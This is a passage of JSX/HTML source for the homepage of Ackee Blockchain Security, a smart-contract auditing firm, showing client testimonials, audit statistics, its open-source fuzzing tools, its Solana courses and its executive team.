                                    impressed with their fuzzing services, which
                                    have been crucial in catching issues that
                                    might have slipped through. They collaborate
                                    closely with our developers, making the
                                    whole process smooth and efficient. Overall,
                                    we’re very satisfied and highly recommend
                                    them."
                                  </em>
                                </p>
                                <p>Lido DAO contributors</p>
                                <figure
                                  style={{ maxWidth: 150 }}
                                  className="w-richtext-align-floatright w-richtext-figure-type-image"
                                >
                                  <div>
                                    <img
                                      src="https://cdn.prod.website-files.com/6621233fd44f04553ba73647/66ead1089a09c1dee4af1bef_66ead0f4bf892ec1d4d080b0_Lido.png"
                                      loading="lazy"
                                      alt=""
                                    />
                                  </div>
                                </figure>
                              </div>
                            </div>
                            <div className="blur_block" />
                          </div>
                        </div>
                      </div>
                      <div role="listitem" className="w-dyn-item">
                        <div className="slide_container">
                          <div className="w-dyn-list">
                            <div
                              role="list"
                              className="tags_container w-dyn-items"
                            >
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Ethereum</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Audit</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Defi</div>
                                </div>
                              </div>
                            </div>
                          </div>
                          <h1>Brahma</h1>
                          <p className="description">
                            Brahma is the unified interface for multi-chain
                            operations. Experience efficient execution and
                            secure management of your crypto assets.
                          </p>
                          <div className="block_black our-work_block block_center slide-block-dark">
                            <div className="block_content">
                              <div className="slider_rich-text text-align-left w-richtext">
                                <p>
                                  <em>
                                    "Ackee was the ideal partner for our
                                    immediate auditing needs, demonstrating deep
                                    knowledge of smart account architecture and
                                    outstanding delivery and communication."
                                  </em>
                                </p>
                                <p>Alessandro Tenconi, Co-Founder &amp; CEO</p>
                                <figure
                                  style={{ maxWidth: 150 }}
                                  className="w-richtext-align-floatright w-richtext-figure-type-image"
                                >
                                  <div>
                                    <img
                                      src="https://cdn.prod.website-files.com/6621233fd44f04553ba73647/6672ddf3976673097d40067e_Brahma-Logo%403x.svg"
                                      loading="lazy"
                                      alt=""
                                    />
                                  </div>
                                </figure>
                                <p>‍</p>
                              </div>
                            </div>
                            <div className="blur_block" />
                          </div>
                        </div>
                      </div>
                      <div role="listitem" className="w-dyn-item">
                        <div className="slide_container">
                          <div className="w-dyn-list">
                            <div
                              role="list"
                              className="tags_container w-dyn-items"
                            >
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Ethereum</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Audit</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Bridge</div>
                                </div>
                              </div>
                            </div>
                          </div>
                          <h1>Axelar</h1>
                          <p className="description">
                            Axelar enables cross-chain communication by
                            providing a decentralized network that can be used
                            for cross-chain requests.
                          </p>
                          <div className="block_black our-work_block block_center slide-block-dark">
                            <div className="block_content">
                              <div className="slider_rich-text text-align-left w-richtext">
                                <p>
                                  <em>
                                    "A pleasure working with an experienced and
                                    dedicated team that knows the ins and outs
                                    of smart contracts. The speed, attention to
                                    detail, and curiosity to ask the right
                                    questions are exceptional."{" "}
                                  </em>
                                </p>
                                <p>
                                  <em>‍</em>Sergey Gorbunov, Co-Founder
                                </p>
                                <figure
                                  style={{ maxWidth: 128 }}
                                  className="w-richtext-align-floatright w-richtext-figure-type-image"
                                >
                                  <div>
                                    <img
                                      src="https://cdn.prod.website-files.com/6621233fd44f04553ba73647/66391b8c04976ecd8a5438a7_Axelar.svg"
                                      loading="lazy"
                                      alt=""
                                    />
                                  </div>
                                </figure>
                              </div>
                            </div>
                            <div className="blur_block" />
                          </div>
                        </div>
                      </div>
                      <div role="listitem" className="w-dyn-item">
                        <div className="slide_container">
                          <div className="w-dyn-list">
                            <div
                              role="list"
                              className="tags_container w-dyn-items"
                            >
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Ethereum</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Audit</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Defi</div>
                                </div>
                              </div>
                            </div>
                          </div>
                          <h1>Safe </h1>
                          <p className="description">
                            The most trusted platform to manage digital assets
                            on Ethereum.
                          </p>
                          <div className="block_black our-work_block block_center slide-block-dark">
                            <div className="block_content">
                              <div className="slider_rich-text text-align-left w-richtext">
                                <p>
                                  <em>
                                    "It is always nice to see the structured
                                    approach on Smart Contract security from the
                                    Ackee Blockchain team. They give detailed
                                    feedback on all levels that help us to
                                    improve the security and code quality of our
                                    project."
                                  </em>
                                </p>
                                <p>
                                  Richard Meissner, Co-Founder &amp;&nbsp;CTO
                                </p>
                                <figure
                                  style={{ maxWidth: 150 }}
                                  className="w-richtext-align-floatright w-richtext-figure-type-image"
                                >
                                  <div>
                                    <img
                                      src="https://cdn.prod.website-files.com/6621233fd44f04553ba73647/6621233fd44f04553ba73660_Safe_Logos_H-Lockup_White.png"
                                      loading="lazy"
                                      alt=""
                                    />
                                  </div>
                                </figure>
                              </div>
                            </div>
                            <div className="blur_block" />
                          </div>
                        </div>
                      </div>
                      <div role="listitem" className="w-dyn-item">
                        <div className="slide_container">
                          <div className="w-dyn-list">
                            <div
                              role="list"
                              className="tags_container w-dyn-items"
                            >
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Ethereum</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Audit</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>DEX</div>
                                </div>
                              </div>
                            </div>
                          </div>
                          <h1>1inch Network</h1>
                          <p className="description">
                            One-stop access to decentralized finance. DEX and
                            DeFi aggregator protocol across Ethereum, BSC,
                            Polygon, Optimism, Arbitrum, Avalanche and Gnosis
                            chain.
                          </p>
                          <div className="block_black our-work_block block_center slide-block-dark">
                            <div className="block_content">
                              <div className="slider_rich-text text-align-left w-richtext">
                                <p>
                                  <em>
                                    "We had much pleasure working with Ackee
                                    Blockchain. They have accomplished several
                                    audits for us, and they always met
                                    deadlines, making at the same time valuable
                                    results even in the projects with a massive
                                    codebase."
                                  </em>
                                </p>
                                <figure
                                  style={{ maxWidth: 150 }}
                                  className="w-richtext-align-floatright w-richtext-figure-type-image"
                                >
                                  <div>
                                    <img
                                      src="https://cdn.prod.website-files.com/6621233fd44f04553ba73647/663922b5ee35029791023298_1inch.svg"
                                      loading="lazy"
                                      alt=""
                                    />
                                  </div>
                                </figure>
                              </div>
                            </div>
                            <div className="blur_block" />
                          </div>
                        </div>
                      </div>
                      <div role="listitem" className="w-dyn-item">
                        <div className="slide_container">
                          <div className="w-dyn-list">
                            <div
                              role="list"
                              className="tags_container w-dyn-items"
                            >
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Ethereum</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Audit</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Defi</div>
                                </div>
                              </div>
                            </div>
                          </div>
                          <h1>Trader Joe</h1>
                          <p className="description">
                            Trader Joe is a one-stop decentralized trading
                            platform on the Avalanche network.
                          </p>
                          <div className="block_black our-work_block block_center slide-block-dark">
                            <div className="block_content">
                              <div className="slider_rich-text text-align-left w-richtext">
                                <p>
                                  <em>
                                    "It has been great working with Ackee
                                    Blockchain. They’re a new auditing company
                                    that also understands web3’s fast pace. The
                                    audits they delivered were thorough and on
                                    time. Moreover, our engineers picked up lots
                                    of knowledge working with them."
                                  </em>
                                </p>
                                <figure
                                  style={{ maxWidth: 150 }}
                                  className="w-richtext-align-floatright w-richtext-figure-type-image"
                                >
                                  <div>
                                    <img
                                      src="https://cdn.prod.website-files.com/6621233fd44f04553ba73647/66391e03087a54186874e790_Trader Joe.svg"
                                      loading="lazy"
                                      alt=""
                                    />
                                  </div>
                                </figure>
                              </div>
                            </div>
                            <div className="blur_block" />
                          </div>
                        </div>
                      </div>
                      <div role="listitem" className="w-dyn-item">
                        <div className="slide_container">
                          <div className="w-dyn-list">
                            <div
                              role="list"
                              className="tags_container w-dyn-items"
                            >
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Ethereum</div>
                                </div>
                              </div>
                              <div role="listitem" className="w-dyn-item">
                                <div className="tag">
                                  <div>Audit</div>
                                </div>
                              </div>
                            </div>
                          </div>
                          <h1>Trezor</h1>
                          <p className="description">
                            Trezor creates cryptocurrency hardware wallets.
                          </p>
                          <div className="block_black our-work_block block_center slide-block-dark">
                            <div className="block_content">
                              <div className="slider_rich-text text-align-left w-richtext">
                                <p>
                                  <em>
                                    "We would like to thank Ackee Blockchain
                                    team for their ability to remain objective
                                    and work with facts during due diligence. We
                                    were impressed by their deep technical
                                    know-how and time efficiency."
                                  </em>
                                </p>
                                <p>Tomas Susanka, CTO </p>
                                <figure
                                  style={{ maxWidth: 150 }}
                                  className="w-richtext-align-floatright w-richtext-figure-type-image"
                                >
                                  <div>
                                    <img
                                      src="https://cdn.prod.website-files.com/6621233fd44f04553ba73647/66391c4f0d5cfab7828c2db4_trezor-main-logo-white-rgb.svg"
                                      loading="lazy"
                                      alt=""
                                    />
                                  </div>
                                </figure>
                              </div>
                            </div>
                            <div className="blur_block" />
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div className="arrow-container">
                    <div className="prev">
                      <img
                        width={42}
                        height={65}
                        src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba736c7_cursor_prev%402x.png"
                        loading="lazy"
                        alt=""
                      />
                    </div>
                    <div className="next">
                      <img
                        width={42}
                        height={65}
                        src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba736dc_cursor_next%402x.png"
                        loading="lazy"
                        alt=""
                      />
                    </div>
                  </div>
                  <div className="arrow-container">
                    <div className="prev">
                      <img
                        width={42}
                        height={65}
                        src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba736c7_cursor_prev%402x.png"
                        loading="lazy"
                        alt=""
                      />
                    </div>
                    <div className="next">
                      <img
                        width={42}
                        height={65}
                        src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba736dc_cursor_next%402x.png"
                        loading="lazy"
                        alt=""
                      />
                    </div>
                  </div>
                </div>
                <div className="client_logo" />
              </div>
            </div>
            <div id="services" className="services_section">
              <div className="container_main">
                <h2 className="text-blue_cr">Blockchain services</h2>
                <div className="columns_3 mt-0-mob">
                  <div className="column mt-40">
                    <div className="block_black">
                      <div className="blur_block" />
                      <div className="block_content dark_block">
                        <div className="service_icon-upd">
                          <img
                            src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66ccc0b538ab927b755e1d2a_icon frame1.svg"
                            loading="lazy"
                            width={180}
                            alt="bug hunt icon"
                            className="block_img sm"
                          />
                        </div>
                        <h3>Smart Contracts Auditing and wallet restore</h3>
                        <div className="services_p-wrap mb-0">
                          <p>
                            Our in-house team of security researchers performs
                            comprehensive security audits, focusing on manual
                            code reviews and extensive fuzz testing. Leveraging
                            our battle-tested tooling, we ensure top-tier
                            security. We offer both one-time audits and
                            continuous auditing services to maintain robust
                            security.
                          </p>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div
                    id="w-node-_956c0be6-c715-7f7b-e4a6-5adb7e0ebc05-3ba73669"
                    className="column mt-40"
                  >
                    <div className="block_black">
                      <div className="blur_block" />
                      <div className="block_content dark_block">
                        <div className="service_icon-upd">
                          <img
                            src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66ccc0b5689fef43d42e73bc_icon frame2.svg"
                            loading="lazy"
                            width={180}
                            alt="security dev icon"
                            className="block_img sm"
                          />
                        </div>
                        <h3>Security Tooling Development</h3>
                        <div className="services_p-wrap mb-0">
                          <p>
                            Ackee security researchers develop security and
                            developer tooling for Solana, Ethereum, and EVM
                            blockchains. Leveraging our tooling, we have
                            identified medium-to-critical vulnerabilities in
                            industry leaders' smart contracts. We have received
                            development grants from Coinbase and the Solana
                            Foundation for building Wake and Trident,
                            respectively.
                          </p>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div
                    id="w-node-_956c0be6-c715-7f7b-e4a6-5adb7e0ebc0e-3ba73669"
                    className="column mt-40"
                  >
                    <div className="block_black">
                      <div className="blur_block" />
                      <div className="block_content dark_block">
                        <div className="service_icon-upd">
                          <img
                            src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66ccc0b5fde90790faf95ff2_icon frame3.svg"
                            loading="lazy"
                            width={180}
                            alt="blockchain education icon"
                            className="block_img sm"
                          />
                        </div>
                        <h3>Blockchain Security Education</h3>
                        <p className="paragraph-4">
                          Our team teaches about EVM and blockchain security at
                          Czech Technical University, led by our co-founder and
                          CEO, Josef Gattermayer, Ph.D. As educational partners
                          of the Solana Foundation, we offer Rust and Solana
                          development courses through our School of Solana.
                        </p>
                        <div className="logos_container">
                          <div className="tooltip _5 complete" />
                          <div className="tooltip _4 complete" />
                          <div className="tooltip complete _3" />
                          <div className="tooltip complete _2" />
                          <div className="tooltip complete" />
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <div id="audit-section" className="audits-section">
              <div className="container_main">
                <h2 className="text-blue_cr">Audits that keep you safe</h2>
                <p className="description mb-4 mb-1">
                  Based on the internal statistics of 1442 days.
                  <br />
                </p>
                <div className="columns_3 mt-0">
                  <div className="column audit">
                    <div className="block_black">
                      <div className="blur_block" />
                      <div className="block_content dark_block is-padding-large">
                        <div className="audits_block-wrap">
                          <h3>158 audits</h3>
                          <p>
                            Our experience and portfolio speaks for itself -
                            trusted by industry leaders such as Safe, Lido and
                            Axelar.
                          </p>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div
                    id="w-node-_3b9e27e5-922e-33fd-e696-61ffd9669d8f-3ba73669"
                    className="column audit"
                    
                  >
                   
  
                    <div className="block_black">
                      <div className="blur_block" />
                      <div className="block_content dark_block is-padding-large">
                        <div className="audits_block-wrap">
                        <h3>166 critical audits</h3>
                          <p>
                            We have discovered more than 1654 issues so far. 10%
                            of them account for critical and high findings.
                          </p>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div
                    id="w-node-_3b9e27e5-922e-33fd-e696-61ffd9669da6-3ba73669"
                    className="column audit"
                  >
                    <div className="block_black">
                      <div className="blur_block" />
                      <div className="block_content dark_block is-padding-large">
                        <div className="audits_block-wrap">
                          <h3>1 day to an issue</h3>
                          <p>
                            Our auditors discover a critical or high issue every
                            5 work days. It takes 2 work days to a critical,
                            high, medium or low issue and 1 day to an issue in
                            general, as of October 2024.
                            <br />‍
                          </p>
                        </div>
                        <div className="logos_container">
                          <div className="tooltip _5 complete" />
                          <div className="tooltip _4 complete" />
                          <div className="tooltip complete _3" />
                          <div className="tooltip complete _2" />
                          <div className="tooltip complete" />
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <div id="work-sec" className="work_section is-centered">
              <div className="container_main">
                <h2 className="text-blue_cr">
                  Our work &amp;&nbsp;open source tools{" "}
                </h2>
                <p className="description">
                  Our mission is to make blockchain a safer space. To make it
                  happen, we create security open source tools for developers
                  and auditors.{" "}
                </p>
                <div className="columns_3 mt-200 mt-o-mobile">
                  <a
                    href="https://getwake.io/"
                    target="_blank"
                    className="hover_gradient w-inline-block" rel="noreferrer"
                  >
                    <div className="block_black">
                      <div className="blur_block" />
                      <div className="block_content dark_block is-padding-small">
                        <div className="work-img_container mb-0">
                          <img
                            src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650b733621a3c6a354b8a81_Frame 196.webp"
                            loading="lazy"
                            sizes="100vw"
                            width={250}
                            alt="Wake Framework"
                            srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650b733621a3c6a354b8a81_Frame%20196-p-500.webp 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650b733621a3c6a354b8a81_Frame%20196-p-800.webp 800w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650b733621a3c6a354b8a81_Frame%20196.webp 1000w"
                            className="work-img"
                          />
                        </div>
                        <div className="vertical-j-space">
                          <h3>Wake</h3>
                          <p className="mb_40">
                            Wake is a Python-based development and testing
                            framework for Solidity and cross-chain fuzzing.{" "}
                          </p>
                        </div>
                        <div className="button-secondary">
                          <div className="bs-text">Learn More</div>
                          <div className="button-arrow w-embed">
                            <svg
                              xmlns="http://www.w3.org/2000/svg"
                              width="100%"
                              height="auto"
                              viewBox="0 0 9 14"
                              fill="none"
                            >
                              <path
                                d="M1 1L7 7L1 13"
                                stroke="currentColor"
                                strokeWidth="1.5"
                              />
                            </svg>
                          </div>
                        </div>
                      </div>
                    </div>
                  </a>
                  <a
                    href="solidity-extension.html"
                    target="_blank"
                    className="hover_gradient w-inline-block"
                  >
                    <div className="block_black">
                      <div className="blur_block" />
                      <div className="block_content dark_block is-padding-small">
                        <div className="work-img_container mb-0">
                          <img
                            src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/670d28195e9959870a31c365_Solidity Ackee.png"
                            loading="lazy"
                            sizes="100vw"
                            width={250}
                            alt=""
                            srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/670d28195e9959870a31c365_Solidity%20Ackee-p-500.png 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/670d28195e9959870a31c365_Solidity%20Ackee-p-800.png 800w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/670d28195e9959870a31c365_Solidity%20Ackee-p-1080.png 1080w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/670d28195e9959870a31c365_Solidity%20Ackee.png 1500w"
                            className="work-img"
                          />
                        </div>
                        <div className="vertical-j-space">
                          <h3>Solidity (Wake)</h3>
                          <p className="mb_40">
                            Code fast and secure Solidity smart contracts on
                            Ethereum with a remix-like experience for testing
                            contracts inside Visual Studio Code.
                          </p>
                        </div>
                        <div className="button-secondary">
                          <div className="bs-text">Learn More</div>
                          <div className="button-arrow w-embed">
                            <svg
                              xmlns="http://www.w3.org/2000/svg"
                              width="100%"
                              height="auto"
                              viewBox="0 0 9 14"
                              fill="none"
                            >
                              <path
                                d="M1 1L7 7L1 13"
                                stroke="currentColor"
                                strokeWidth="1.5"
                              />
                            </svg>
                          </div>
                        </div>
                      </div>
                    </div>
                  </a>
                  <a
                    href="https://x.com/TridentSolana"
                    target="_blank"
                    className="hover_gradient w-inline-block" rel="noreferrer"
                  >
                    <div className="block_black">
                      <div className="blur_block" />
                      <div className="block_content dark_block is-padding-small">
                        <div className="work-img_container mb-0">
                          <img
                            src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650b734bac4f63445603b1a_Frame 197.webp"
                            loading="lazy"
                            sizes="100vw"
                            width={250}
                            alt="Trident"
                            srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650b734bac4f63445603b1a_Frame%20197-p-500.webp 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650b734bac4f63445603b1a_Frame%20197-p-800.webp 800w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650b734bac4f63445603b1a_Frame%20197.webp 1000w"
                            className="work-img"
                          />
                        </div>
                        <div className="vertical-j-space">
                          <h3>Trident</h3>
                          <p className="mb_40">
                            Trident is a Rust-based framework to fuzz and
                            integration test Solana programs to help you ship
                            secure code.
                          </p>
                        </div>
                        <div className="button-secondary">
                          <div className="bs-text">Learn More</div>
                          <div className="button-arrow w-embed">
                            <svg
                              xmlns="http://www.w3.org/2000/svg"
                              width="100%"
                              height="auto"
                              viewBox="0 0 9 14"
                              fill="none"
                            >
                              <path
                                d="M1 1L7 7L1 13"
                                stroke="currentColor"
                                strokeWidth="1.5"
                              />
                            </svg>
                          </div>
                        </div>
                      </div>
                    </div>
                  </a>
                </div>
                <div className="block_black is-trusted">
                  <div className="div-block-5">
                    <h2 className="text-color-cyan">Trusted by the Best</h2>
                    <p className="text-size-large mww">
                      We have received official development and community grants
                      from key blockchain companies and foundations.
                    </p>
                    <div className="logos-grid _3--col">
                      <a
                        href="https://www.ackee.agency/blog/devcon-throwbacks"
                        target="_blank"
                        className="trust_logo is-medium w-inline-block" rel="noreferrer"
                      >
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650a717d4e5e90f2f30b9d7_Logo1.png"
                          loading="lazy"
                          width={151}
                          sizes="100vw"
                          alt="Ethereum Foundation"
                          srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650a717d4e5e90f2f30b9d7_Logo1-p-500.png 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650a717d4e5e90f2f30b9d7_Logo1.png 785w"
                          className="img-full-height"
                        />
                      </a>
                      <a
                        href="https://www.coinbase.com/"
                        target="_blank"
                        className="trust_logo is-medium w-inline-block" rel="noreferrer"
                      >
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650a716624dbe0ef6271e30_Logo2.png"
                          loading="lazy"
                          width={125}
                          sizes="100vw"
                          alt="Coinbase"
                          srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650a716624dbe0ef6271e30_Logo2-p-500.png 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650a716624dbe0ef6271e30_Logo2.png 732w"
                          className="img-full-height"
                        />
                      </a>
                      <a
                        href="https://ackeeblockchain.com/blog/announcing-the-winter-school-of-solana-2023/"
                        target="_blank"
                        className="trust_logo is-medium w-inline-block" rel="noreferrer"
                      >
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650a716391726cbb4519d5a_Logo3.png"
                          loading="lazy"
                          width={179}
                          sizes="100vw"
                          alt="Solana Foundation"
                          srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650a716391726cbb4519d5a_Logo3-p-500.png 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650a716391726cbb4519d5a_Logo3.png 787w"
                          className="img-full-height"
                        />
                      </a>
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <div className="our-work_section pb-0">
              <img
                src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650bb572bd1354a87c39ba9_Group 188.webp"
                alt="Trident Shards"
                sizes="100vw"
                srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650bb572bd1354a87c39ba9_Group%20188-p-500.webp 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650bb572bd1354a87c39ba9_Group%20188-p-800.webp 800w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650bb572bd1354a87c39ba9_Group%20188-p-1080.webp 1080w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650bb572bd1354a87c39ba9_Group%20188-p-1600.webp 1600w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650bb572bd1354a87c39ba9_Group%20188-p-2000.webp 2000w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650bb572bd1354a87c39ba9_Group%20188-p-2600.webp 2600w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650bb572bd1354a87c39ba9_Group%20188.webp 3224w"
                className="bg-decoration"
              />
              <div className="container-ii w-clearfix">
                <h2 className="text-blue">Educating developers about Web3</h2>
                <p className="description text-size-large">
                  As educational partner of the Solana Foundation we teach
                  developers about Rust, Solana development and security.
                </p>
                <div className="onboarding_row-single">
                  <a
                    id="w-node-_4083654e-0fd3-ba1a-028b-fd1218ccc564-3ba73669"
                    href="school-of-solana.html"
                    className="hover_gradient w-inline-block"
                  >
                    <div
                      id="w-node-c107f2e2-84f5-5387-2178-3b658ad09793-3ba73669"
                      className="block_content onb"
                    >
                      <h3>School of Solana</h3>
                      <p className="text-size-md">
                        Take your technical skills to the next level and get a
                        certification in the Rust language and Solana
                        blockchain.
                      </p>
                      <div className="mt-48">
                        <div className="subheader">Educational partner of</div>
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650bb42e9969a77baaf02bf_Group 186.svg"
                          loading="lazy"
                          alt="Solana Foundation"
                          className="solana-logo"
                        />
                      </div>
                      <div className="mt-48">
                        <div className="text-size-md">Date</div>
                        <div className="text-color-white text-semibold mb_20 text-22">
                          Starts on October 16
                        </div>
                        <div className="button-secondary">
                          <div className="bs-text">Apply now</div>
                          <div className="button-arrow w-embed">
                            <svg
                              xmlns="http://www.w3.org/2000/svg"
                              width="100%"
                              height="auto"
                              viewBox="0 0 9 14"
                              fill="none"
                            >
                              <path
                                d="M1 1L7 7L1 13"
                                stroke="currentColor"
                                strokeWidth="1.5"
                              />
                            </svg>
                          </div>
                        </div>
                      </div>
                    </div>
                  </a>
                  <a
                    href="solana-auditors-bootcamp.html"
                    className="hover_gradient w-inline-block"
                  >
                    <div
                      id="w-node-_3c5719ed-9d7e-c60e-762e-f80a8a81846e-3ba73669"
                      className="block_content onb"
                    >
                      <h3>Solana Auditors Bootcamp</h3>
                      <p className="text-size-md">
                        Learn to audit Solana programs and help secure the
                        ecosystem.
                      </p>
                      <div className="mt-48">
                        <div className="subheader">Educational partner of</div>
                        <img
                          src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6650bb42e9969a77baaf02bf_Group 186.svg"
                          loading="lazy"
                          alt="Solana Foundation"
                          className="solana-logo"
                        />
                      </div>
                      <div className="mt-48">
                        <div className="text-size-md">Date</div>
                        <div className="text-color-white text-semibold mb_20 text-22">
                          Starts on August 14{" "}
                        </div>
                        <div className="button-secondary">
                          <div className="bs-text">Apply now</div>
                          <div className="button-arrow w-embed">
                            <svg
                              xmlns="http://www.w3.org/2000/svg"
                              width="100%"
                              height="auto"
                              viewBox="0 0 9 14"
                              fill="none"
                            >
                              <path
                                d="M1 1L7 7L1 13"
                                stroke="currentColor"
                                strokeWidth="1.5"
                              />
                            </svg>
                          </div>
                        </div>
                      </div>
                    </div>
                  </a>
                </div>
                <div className="block_black our-work_block hide" />
                <div className="block_black our-work_block right_block hide" />
              </div>
            </div>
            <div id="team" className="team_section no-bg">
              <div className="container-ii">
                <h2 className="text-blue">Executive team</h2>
                <p className="description">
                  With years of experience under our belt, we are ready for any
                  challenge.
                </p>
                <div className="columns_3 team _1">
                  <div className="column team hover_gradient _1">
                    <div className="block_black _w-100 upd">
                      <div className="block_content dark_block text-align-center">
                        <div className="team_photo-container">
                          <img
                            src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73789_josef_g_transp.png"
                            loading="lazy"
                            width={180}
                            sizes="100vw"
                            alt="picture of josef gattermayer "
                            srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73789_josef_g_transp-p-500.png 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73789_josef_g_transp-p-800.png 800w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73789_josef_g_transp-p-1080.png 1080w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73789_josef_g_transp.png 1168w"
                            className="block_img sm"
                          />
                        </div>
                        <h3>Josef Gattermayer</h3>
                        <h4>CEO and Co-Founder</h4>
                        <div className="team_description">
                          <p className="team_p">
                            Co-founder of Ackee &amp; assistant professor at
                            CTU, where he received a doctorate in Distributed
                            Systems. A regular speaker at important blockchain
                            events, such as DevCon and Solana Breakpoint.
                          </p>
                        </div>
                      </div>
                      <div className="blur_block" />
                    </div>
                  </div>
                  <div className="column team hover_gradient _1">
                    <div className="block_black _w-100 upd">
                      <div className="block_content dark_block text-align-center">
                        <div className="team_photo-container">
                          <img
                            src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73796_foto 4.png"
                            loading="lazy"
                            width={180}
                            sizes="100vw"
                            alt="Tomas Bayer"
                            srcSet="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73796_foto%25204-p-500.png 500w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73796_foto%25204-p-800.png 800w, https://cdn.prod.website-files.com/6621233fd44f04553ba73645/6621233fd44f04553ba73796_foto%204.png 1035w"
                            className="block_img sm"
                          />
                        </div>
                        <h3>Tomas Bayer</h3>
                        <h4>Chief Operating Officer</h4>
                        <div className="team_description">
                          <p className="team_p">
                            Crypto veteran with a background in managing
                            business for several tech companies worldwide. He
                            provides expertise in operations and business
                            development here at Ackee Blockchain Security.
                            <br />‍
                          </p>
                        </div>
                      </div>
                      <div className="blur_block" />
                    </div>
                  </div>
                  <div className="column team hover_gradient _1">
                    <div className="block_black _w-100 upd">
                      <div className="block_content dark_block text-align-center">
                        <div className="team_photo-container">
                          <img
                            src="https://cdn.prod.website-files.com/6621233fd44f04553ba73645/66a9028887d6693255950f5a_image 5 (2).png"
                            loading="lazy"
                            width={180}
                            alt="Stepan Sonsky"
                            className="block_img sm"
                          />
                        </div>
                        <h3>Stepan Sonsky</h3>
                        <h4>Ethereum Team Lead</h4>
                        <div className="team_description">
                          <p className="team_p">
                            Crypto-anarchist and tech enthusiast with 10+ years
                            experience in software architecture and development.
                            He found passion in white hat hacking and taking
                            care of our Ethereum team.
                          </p>
                        </div>
                      </div>
                      <div className="blur_block" />
                    </div>
                  </div>
                </div>
                <div className="team_grid _1">
                  <div
                    id="w-node-a797b771-7f84-a9ac-524f-5aa94e905f14-3ba73669"
                    className="hide-tablet"
                  />
                  <div className="column team hover_gradient _1">
                    <div className="block_black _w-100 upd">
